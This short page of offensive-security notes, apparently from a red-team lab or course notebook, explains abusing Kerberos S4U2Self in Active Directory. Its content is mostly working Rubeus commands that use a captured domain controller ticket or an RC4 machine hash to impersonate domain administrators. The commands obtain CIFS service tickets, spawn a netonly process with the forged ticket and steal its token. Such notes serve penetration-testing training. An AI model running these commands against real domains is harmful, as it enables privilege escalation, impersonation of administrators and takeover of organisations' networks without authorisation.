S4U2Self Abuse

Machines do not get remote local admin access to themselves.

What we can do instead is abuse S4U2Self to obtain a usable TGS as a user we know is a local admin (e.g. a domain admin). Rubeus has a /self flag for this purpose.

We will use caught Domain Controller Ticket from Unconstrained Delegation.

Abuse to obtain useable TGS as a user who we know is local admin

Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

[+] ProcessID       : 3608

steal_token 3608

Example one-liner

Rubeus.exe s4u /domain:ZSM.LOCAL /impersonateuser:Administrator /self /altservice:cifs/ZPH-SVRMGMT1.ZSM.LOCAL /dc:192.168.210.10 /user:ZPH-SVRMGMT1$ /rc4:89d0b5687...ad336a77b8ef2f /ptt

Last updated 1 year ago